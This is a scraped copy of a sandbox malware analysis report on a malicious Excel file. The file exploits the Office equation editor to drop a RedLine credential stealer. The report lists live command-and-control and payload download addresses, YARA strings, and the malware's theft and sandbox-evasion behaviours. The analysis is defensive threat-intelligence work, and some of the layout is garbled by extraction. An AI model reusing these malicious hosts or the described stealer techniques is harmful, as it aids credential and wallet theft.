Automated Malware Analysis Report for as6xxgzNFj.xls - Generated ...
Automated Malware Analysis Report for POAT2076452.xlsx ...
-
Upload
khangminh22 -
Category
Documents
-
view
1 -
download
0
Transcript of Automated Malware Analysis Report for POAT2076452.xlsx ...
ID: 576509Sample Name:POAT2076452.xlsxCookbook:defaultwindowsofficecookbook.jbsTime: 15:29:06Date: 22/02/2022Version: 34.0.0 Boulder Opal
2444444444445555556666666666677889999
1010101010111415
1516161616161616161616171717181818191919192020202121212222
Table of Contents
Table of ContentsWindows Analysis Report POAT2076452.xlsx
OverviewGeneral InformationDetectionSignaturesClassification
Process TreeMalware Configuration
Threatname: RedLineYara Signatures
PCAP (Network Traffic)Memory DumpsUnpacked PEs
Sigma SignaturesExploitsSystem Summary
Joe Sandbox SignaturesAV DetectionExploitsNetworkingSystem SummaryData ObfuscationBoot SurvivalHooking and other Techniques for Hiding and ProtectionMalware Analysis System EvasionHIPS / PFW / Operating System Protection EvasionStealing of Sensitive InformationRemote Access Functionality
Mitre Att&ck MatrixBehavior GraphScreenshots
ThumbnailsAntivirus, Machine Learning and Genetic Malware Detection
Initial SampleDropped FilesUnpacked PE FilesDomainsURLs
Domains and IPsContacted DomainsContacted URLsURLs from Memory and BinariesWorld Map of Contacted IPs
Public IPs
General InformationWarnings
SimulationsBehavior and APIs
Joe Sandbox View / ContextIPsDomainsASNsJA3 FingerprintsDropped Files
Created / dropped FilesC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exeC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34F90E45.pngC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FE9EF17.pngC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51123782.pngC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\540F5A54.pngC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\597D09DF.pngC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D634E2C.pngC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5A50888.emfC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF292561.pngC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEDCE7D6.jpegC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBC9D9B.pngC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E382C2E0.jpegC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F0748BEE.pngC:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9EE9.pngC:\Users\user\AppData\Local\Temp\tmp3E26.tmpC:\Users\user\AppData\Local\Temp\tmp3EE2.tmpC:\Users\user\AppData\Local\Temp\tmp3FAE.tmpC:\Users\user\AppData\Local\Temp\tmp533A.tmp
Copyright Joe Security LLC 2022 Page 2 of 65
22232323242424252525252626262727272828282929292930303031313131313132343434343437464646464646464646
4747474747
47474848
484848
49494949505164
65
C:\Users\user\AppData\Local\Temp\tmp6222.tmpC:\Users\user\AppData\Local\Temp\tmp62EE.tmpC:\Users\user\AppData\Local\Temp\tmp6417.tmpC:\Users\user\AppData\Local\Temp\tmp64E3.tmpC:\Users\user\AppData\Local\Temp\tmp66A8.tmpC:\Users\user\AppData\Local\Temp\tmp67A3.tmpC:\Users\user\AppData\Local\Temp\tmp6AC0.tmpC:\Users\user\AppData\Local\Temp\tmp6C85.tmpC:\Users\user\AppData\Local\Temp\tmp7108.tmpC:\Users\user\AppData\Local\Temp\tmp71C5.tmpC:\Users\user\AppData\Local\Temp\tmp72BF.tmpC:\Users\user\AppData\Local\Temp\tmp738B.tmpC:\Users\user\AppData\Local\Temp\tmp7486.tmpC:\Users\user\AppData\Local\Temp\tmp7551.tmpC:\Users\user\AppData\Local\Temp\tmp764C.tmpC:\Users\user\AppData\Local\Temp\tmp7718.tmpC:\Users\user\AppData\Local\Temp\tmp7841.tmpC:\Users\user\AppData\Local\Temp\tmp790D.tmpC:\Users\user\AppData\Local\Temp\tmp79D9.tmpC:\Users\user\AppData\Local\Temp\tmp7AA5.tmpC:\Users\user\AppData\Local\Temp\tmp7BCE.tmpC:\Users\user\AppData\Local\Temp\tmp7CF7.tmpC:\Users\user\AppData\Local\Temp\~DF179744FD61C7CF51.TMPC:\Users\user\AppData\Local\Temp\~DF26FE9B5EC11612F4.TMPC:\Users\user\AppData\Local\Temp\~DFAB0D2DA66A547388.TMPC:\Users\user\AppData\Local\Temp\~DFEA839BB433B75553.TMPC:\Users\user\Desktop\~$POAT2076452.xlsxC:\Users\Public\vbc.exe
Static File InfoGeneralFile Icon
Network BehaviorNetwork Port DistributionTCP PacketsUDP PacketsDNS QueriesDNS AnswersHTTP Request Dependency GraphHTTP PacketsHTTPS Proxied Packets
StatisticsBehavior
System BehaviorAnalysis Process: EXCEL.EXEPID: 2580, Parent PID: 596
GeneralFile ActivitiesRegistry Activities
Key CreatedKey Value Created
Analysis Process: EQNEDT32.EXEPID: 2664, Parent PID: 596GeneralFile ActivitiesRegistry Activities
Key Created
Analysis Process: vbc.exePID: 1828, Parent PID: 2664GeneralFile Activities
File Read
Registry ActivitiesKey CreatedKey Value Created
Analysis Process: vbc.exePID: 2844, Parent PID: 1828GeneralFile Activities
File CreatedFile DeletedFile WrittenFile Read
Disassembly
Copyright Joe Security LLC 2022 Page 3 of 65
Windows Analysis Report POAT2076452.xlsx
Overview
General Information
Sample Name:
POAT2076452.xlsx
Analysis ID: 576509
MD5: e9ffc84abf7ed6f…
SHA1: d636a41a99a022…
SHA256: 03d548395841b2…
Tags: Formbook
VelvetSweatshop xlsx
Infos:
Detection
RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Yara detected RedLine Stealer
Found malware configuration
Sigma detected: EQNEDT32.EXE c…
Multi AV Scanner detection for subm…
Malicious sample detected (through…
Sigma detected: Droppers Exploiting…
Sigma detected: File Dropped By EQ…
Antivirus detection for URL or domain
Tries to steal Crypto Currency Walle…
Uses known network protocols on n…
Office equation editor starts process…
.NET source code contains potentia…
Injects a PE file into a foreign proce…
Sigma detected: Suspicious Program…
Sigma detected: Execution from Su…
Queries sensitive video device infor…
Office equation editor drops PE file
Queries sensitive disk information (v…
Machine Learning detection for drop…
Searches for Windows Mail specific…
Drops PE files to the user root direc…
Found many strings related to Crypt…
Tries to harvest and steal browser in…
Queries the volume information (nam…
Yara signature match
May sleep (evasive loops) to hinder…
Checks if Antivirus/Antispyware/Fire…
Detected potential crypto function
Stores large binary data to the regis…
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in co…
Potential document exploit detected…
HTTP GET or POST without a user …
IP address seen in connection with …
Downloads executable code via HTT…
Uses insecure TLS / SSL version fo…
Contains long sleeps (>= 3 min)
Enables debug privileges
Classification
Ransomware
Spreading
Phishing
Banker
Trojan / Bot
Adware
Spyware
Exploiter
Evader
Miner
clean
clean
clean
clean
clean
clean
clean
suspicious
suspicious
suspicious
suspicious
suspicious
suspicious
suspicious
malicious
malicious
malicious
malicious
malicious
malicious
malicious
System is w7x64
EXCEL.EXE (PID: 2580 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
EQNEDT32.EXE (PID: 2664 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5:
A87236E214F6D42A65F5DEDAC816AEC8)vbc.exe (PID: 1828 cmdline: "C:\Users\Public\vbc.exe" MD5: 980EC4304344F277D722024ADE08CD01)
vbc.exe (PID: 2844 cmdline: C:\Users\Public\vbc.exe MD5: 980EC4304344F277D722024ADE08CD01)
cleanup
{
"C2 url": [
"179.43.175.99:21900"
],
"Bot Id": "cheat"
}
Source Rule Description Author Strings
dump.pcap JoeSecurity_RedLine
Yara detected RedLine Stealer
Joe Security
dump.pcap JoeSecurity_RedLine_1
Yara detected RedLine Stealer
Joe Security
Process Tree
Malware Configuration
Threatname: RedLine
Yara Signatures
PCAP (Network Tra c)
Copyright Joe Security LLC 2022 Page 4 of 65
Source Rule Description Author Strings
00000004.00000002.501429999.0000000003319000.00000004.00000800.00020000.00000000.sdmp
JoeSecurity_RedLine
Yara detected RedLine Stealer
Joe Security
00000004.00000002.501429999.0000000003319000.00000004.00000800.00020000.00000000.sdmp
JoeSecurity_CredentialStealer
Yara detected Credential Stealer
Joe Security
00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp
JoeSecurity_RedLine
Yara detected RedLine Stealer
Joe Security
00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp
JoeSecurity_CredentialStealer
Yara detected Credential Stealer
Joe Security
00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp
JoeSecurity_RedLine
Yara detected RedLine Stealer
Joe Security
Click to see the 16 entries
Source Rule Description Author Strings
5.0.vbc.exe.400000.8.unpack JoeSecurity_RedLine
Yara detected RedLine Stealer
Joe Security
5.0.vbc.exe.400000.8.unpack JoeSecurity_CredentialStealer
Yara detected Credential Stealer
Joe Security
5.0.vbc.exe.400000.8.unpack MALWARE_Win_RedLine
Detects RedLine infostealer
ditekSHen 0x1048a:$u7: RunPE0x13b41:$u8: DownloadAndEx0x9130:$pat14: , CommandLine:0x13079:$v2_1: ListOfProcesses0x1068b:$v2_2: get_ScanVPN0x1072e:$v2_2: get_ScanFTP0x1141e:$v2_2: get_ScanDiscord0x1240c:$v2_2: get_ScanSteam0x12428:$v2_2: get_ScanTelegram0x124ce:$v2_2: get_ScanScreen0x13216:$v2_2: get_ScanChromeBrowsersPaths0x1324e:$v2_2: get_ScanGeckoBrowsersPaths0x13509:$v2_2: get_ScanBrowsers0x135ca:$v2_2: get_ScannedWallets0x135f0:$v2_2: get_ScanWallets0x13610:$v2_3: GetArguments0x11cd9:$v2_4: VerifyUpdate0x165ea:$v2_4: VerifyUpdate0x139ca:$v2_5: VerifyScanRequest0x130c6:$v2_6: GetUpdates0x165cb:$v2_6: GetUpdates
5.0.vbc.exe.400000.12.unpack JoeSecurity_RedLine
Yara detected RedLine Stealer
Joe Security
5.0.vbc.exe.400000.12.unpack JoeSecurity_CredentialStealer
Yara detected Credential Stealer
Joe Security
Click to see the 23 entries
Exploits
System Summary
Memory Dumps
Unpacked PEs
Sigma Signatures
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Execution from Suspicious Folder
Joe Sandbox Signatures
Copyright Joe Security LLC 2022 Page 5 of 65
AV Detection
Exploits
Networking
System Summary
Data Obfuscation
Boot Survival
Hooking and other Techniques for Hiding and Protection
Malware Analysis System Evasion
HIPS / PFW / Operating System Protection Evasion
Stealing of Sensitive Information
Remote Access Functionality
Found malware configuration
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Machine Learning detection for dropped file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Uses known network protocols on non-standard ports
Malicious sample detected (through community Yara rule)
Office equation editor drops PE file
.NET source code contains potential unpacker
Drops PE files to the user root directory
Uses known network protocols on non-standard ports
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Injects a PE file into a foreign processes
Yara detected RedLine Stealer
Tries to steal Crypto Currency Wallets
Searches for Windows Mail specific files
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected RedLine Stealer
Copyright Joe Security LLC 2022 Page 6 of 65
InitialAccess
Execution PersistencePrivilegeEscalation
DefenseEvasion
CredentialAccess
DiscoveryLateralMovement
Collection ExfiltrationCommandandControl
NetworkEffects
RemoteServiceEffects
Impact
ValidAccounts
2 2 1WindowsManagementInstrumentation
PathInterception
1 1 1ProcessInjection
1 1 1Masquerading
1OSCredentialDumping
1QueryRegistry
RemoteServices
1EmailCollection
ExfiltrationOver OtherNetworkMedium
1 1EncryptedChannel
Eavesdropon InsecureNetworkCommunication
RemotelyTrackDeviceWithoutAuthorization
ModifySystemPartition
DefaultAccounts
1 3Exploitationfor ClientExecution
Boot orLogonInitialization Scripts
1ExtraWindowMemoryInjection
1ModifyRegistry
LSASSMemory
2 3SecuritySoftwareDiscovery
RemoteDesktopProtocol
1ArchiveCollectedData
ExfiltrationOverBluetooth
1 1Non-StandardPort
Exploit SS7to RedirectPhoneCalls/SMS
RemotelyWipe DataWithoutAuthorization
DeviceLockout
DomainAccounts
At (Linux) LogonScript(Windows)
LogonScript(Windows)
1Disable orModifyTools
SecurityAccountManager
1ProcessDiscovery
SMB/Windows AdminShares
3Data fromLocalSystem
AutomatedExfiltration
1 2IngressToolTransfer
Exploit SS7to TrackDeviceLocation
ObtainDeviceCloudBackups
DeleteDeviceData
LocalAccounts
At(Windows)
LogonScript(Mac)
LogonScript(Mac)
2 3 1Virtualization/SandboxEvasion
NTDS 2 3 1Virtualization/SandboxEvasion
DistributedComponentObjectModel
InputCapture
ScheduledTransfer
3Non-ApplicationLayerProtocol
SIM CardSwap
CarrierBillingFraud
CloudAccounts
Cron NetworkLogonScript
NetworkLogonScript
1 1 1ProcessInjection
LSASecrets
1RemoteSystemDiscovery
SSH Keylogging DataTransferSize Limits
2 4ApplicationLayerProtocol
ManipulateDeviceCommunication
ManipulateApp StoreRankingsor Ratings
ReplicationThroughRemovableMedia
Launchd Rc.common
Rc.common
1SoftwarePacking
CachedDomainCredentials
1File andDirectoryDiscovery
VNC GUI InputCapture
ExfiltrationOver C2Channel
MultibandCommunication
Jamming orDenial ofService
AbuseAccessibility Features
ExternalRemoteServices
ScheduledTask
StartupItems
StartupItems
1ExtraWindowMemoryInjection
DCSync 1 1 4SystemInformationDiscovery
WindowsRemoteManagement
Web PortalCapture
ExfiltrationOverAlternativeProtocol
CommonlyUsed Port
Rogue Wi-Fi AccessPoints
DataEncryptedfor Impact
Mitre Att&ck Matrix
Behavior Graph
Copyright Joe Security LLC 2022 Page 7 of 65
Behavior GraphID: 576509
Sample: POAT2076452.xlsx
Startdate: 22/02/2022
Architecture: WINDOWS
Score: 100
Found malware configurationMalicious sample detected(through community Yara
rule)
Antivirus detectionfor URL or domain 14 other signatures
EQNEDT32.EXE
12
started
EXCEL.EXE
33 29
started
103.171.0.134, 49165, 80
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
unknown
C:\Users\user\AppData\Local\...\.win32[1].exe, PE32
dropped
C:\Users\Public\vbc.exe, PE32
dropped
Office equation editorstarts processes (likely
CVE 2017-11882 or CVE-2018-0802)
vbc.exe
12
started C:\Users\user\Desktop\~$POAT2076452.xlsx, data
dropped
olypath.com
178.18.193.160, 49167, 80
VARGONENTR
Turkey
cdn.discordapp.com
162.159.130.233, 443, 49166
CLOUDFLARENETUS
United States
Queries sensitive videodevice information (via
WMI, Win32_VideoController,often done to detect
virtual machines)
Queries sensitive diskinformation (via WMI,
Win32_DiskDrive, oftendone to detect virtual
machines)
Injects a PE file intoa foreign processes
vbc.exe
28
started
179.43.175.99, 21900, 49168, 49170
PLI-ASCH
Panama
api.ip.sb
Searches for WindowsMail specific files
Tries to harvest andsteal browser information
(history, passwords,etc)
Tries to steal CryptoCurrency Wallets
Legend:
Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet
Hide Legend
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Screenshots
Thumbnails
Copyright Joe Security LLC 2022 Page 8 of 65
Source Detection Scanner Label Link
POAT2076452.xlsx 35% ReversingLabs Document-OLE.Exploit.CVE-2017-11882
Source Detection Scanner Label Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe
100% Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe
7% ReversingLabs
C:\Users\Public\vbc.exe 7% ReversingLabs
Source Detection Scanner Label Link Download
5.2.vbc.exe.400000.0.unpack 100% Avira HEUR/AGEN.1144480
5.0.vbc.exe.400000.16.unpack 100% Avira HEUR/AGEN.1144480
5.0.vbc.exe.400000.10.unpack 100% Avira HEUR/AGEN.1144480
Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
Dropped Files
Unpacked PE Files
Download File
Download File
Download File
Copyright Joe Security LLC 2022 Page 9 of 65
5.0.vbc.exe.400000.8.unpack 100% Avira HEUR/AGEN.1144480
5.0.vbc.exe.400000.12.unpack 100% Avira HEUR/AGEN.1144480
5.0.vbc.exe.400000.14.unpack 100% Avira HEUR/AGEN.1144480
Source Detection Scanner Label Link Download
⊘ No Antivirus matches
Source Detection Scanner Label Link
ns.adobe.c/s 0% Avira URL Cloud safe
ocsp.entrust.net03 0% URL Reputation safe
tempuri.org/Endpoint/EnvironmentSettings 0% URL Reputation safe
179.43.175.99:21900x0 0% Avira URL Cloud safe
https://api.ip.sb/geoip 0% URL Reputation safe
crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 0% URL Reputation safe
tempuri.org/ 0% URL Reputation safe
www.diginotar.nl/cps/pkioverheid0 0% URL Reputation safe
103.171.0.134/_spaceX2__/.win32.exe 100% Avira URL Cloud malware
tempuri.org/Endpoint/VerifyUpdateResponse 0% URL Reputation safe
tempuri.org/Endpoint/CheckConnectprH= 100% Avira URL Cloud phishing
tempuri.org/Endpoint/SetEnvironment 0% URL Reputation safe
tempuri.org/Endpoint/SetEnvironmentResponse 0% URL Reputation safe
tempuri.org/Endpoint/GetUpdates 0% URL Reputation safe
https://api.ipify.orgcookies//settinString.Removeg 0% URL Reputation safe
179.43.175.99:21900 0% Avira URL Cloud safe
tempuri.org/Endpoint/VerifyUpdate 0% URL Reputation safe
tempuri.org/Endpoint/SetEnvironmenteMH= 100% Avira URL Cloud phishing
ocsp.entrust.net0D 0% URL Reputation safe
tempuri.org/Endpoint/CheckConnectResponse 0% URL Reputation safe
schemas.datacontract.org/2004/07/ 0% URL Reputation safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE% 0% URL Reputation safe
https://api.ip.sbP 0% Avira URL Cloud safe
crl.pkioverheid.nl/DomOvLatestCRL.crl0 0% URL Reputation safe
tempuri.org/Endpoint/GetUpdatesResponse 0% URL Reputation safe
tempuri.org/Endpoint/EnvironmentSettingsResponse 0% URL Reputation safe
olypath.com/RLBIl.exe 100% Avira URL Cloud malware
ns.adobe. 0% URL Reputation safe
https://api.ipify. 0% Avira URL Cloud safe
olypath.comP 0% Avira URL Cloud safe
tempuri.org/h 100% Avira URL Cloud phishing
https://api.ipify.orgcoo 0% Avira URL Cloud safe
179.43.175.99:21900/ 0% Avira URL Cloud safe
Name IP Active Malicious Antivirus Detection Reputation
cdn.discordapp.com 162.159.130.233 true false high
olypath.com 178.18.193.160 true false unknown
api.ip.sb unknown unknown true unknown
Download File
Download File
Download File
Domains
URLs
Domains and IPs
Contacted Domains
Contacted URLs
Copyright Joe Security LLC 2022 Page 10 of 65
Name Malicious Antivirus Detection Reputation
103.171.0.134/_spaceX2__/.win32.exe true Avira URL Cloud: malware unknown
https://cdn.discordapp.com/attachments/926046144130351104/945362888414072923/httpsgithub.comrakam-iorecipesblobmastersegmentstripestripe_balance.model.jsonnet.htme
false high
olypath.com/RLBIl.exe true Avira URL Cloud: malware unknown
179.43.175.99:21900/ true Avira URL Cloud: safe unknown
Name Source Malicious Antivirus Detection Reputation
https://duckduckgo.com/chrome_newtab vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr
false high
ns.adobe.c/s vbc.exe, 00000005.00000002.549398134.000000000500D000.00000004.00000800.00020000.00000000.sdmp
false Avira URL Cloud: safe unknown
https://duckduckgo.com/ac/?q= vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr
false high
ocsp.entrust.net03 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp
false URL Reputation: safe unknown
tempuri.org/Endpoint/EnvironmentSettings vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
179.43.175.99:21900x0 vbc.exe, 00000005.00000002.548189669.0000000002705000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547940264.0000000002557000.00000004.00000800.00020000.00000000.sdmp
false Avira URL Cloud: safe low
https://api.ip.sb/geoip vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
schemas.xmlsoap.org/soap/envelope/ vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp
false high
crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp
false URL Reputation: safe unknown
tempuri.org/ vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
www.diginotar.nl/cps/pkioverheid0 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp
false URL Reputation: safe unknown
URLs from Memory and Binaries
Copyright Joe Security LLC 2022 Page 11 of 65
tempuri.org/Endpoint/VerifyUpdateResponse vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
tempuri.org/Endpoint/CheckConnectprH= vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
true Avira URL Cloud: phishing unknown
tempuri.org/Endpoint/SetEnvironment vbc.exe, 00000005.00000002.547940264.0000000002557000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
tempuri.org/Endpoint/SetEnvironmentResponse vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
tempuri.org/Endpoint/GetUpdates vbc.exe, 00000005.00000002.548189669.0000000002705000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547547882.0000000002381000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
https://api.ipify.orgcookies//settinString.Removeg vbc.exe, vbc.exe, 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp
true URL Reputation: safe unknown
schemas.xmlsoap.org/ws/2004/08/addressing/faultvbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false high
179.43.175.99:21900 vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false Avira URL Cloud: safe unknown
tempuri.org/Endpoint/VerifyUpdate vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
tempuri.org/Endpoint/SetEnvironmenteMH= vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
true Avira URL Cloud: phishing unknown
ocsp.entrust.net0D vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp
false URL Reputation: safe unknown
schemas.xmlsoap.org/ws/2005/05/identity/claims/name
vbc.exe, 00000004.00000002.498497574.0000000002311000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false high
https://ipinfo.io/ip%appdata% vbc.exe, vbc.exe, 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp
false high
crl.entrust.net/server1.crl0 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp
false high
schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false high
tempuri.org/Endpoint/CheckConnectResponse vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
schemas.datacontract.org/2004/07/ vbc.exe, 00000005.00000002.547940264.0000000002557000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
Name Source Malicious Antivirus Detection Reputation
Copyright Joe Security LLC 2022 Page 12 of 65
https://api.ip.sb/geoip%USERPEnvironmentROFILE%vbc.exe, vbc.exe, 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp
false URL Reputation: safe unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr
false high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr
false high
https://cdn.discordapp.com vbc.exe, 00000004.00000002.498497574.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false high
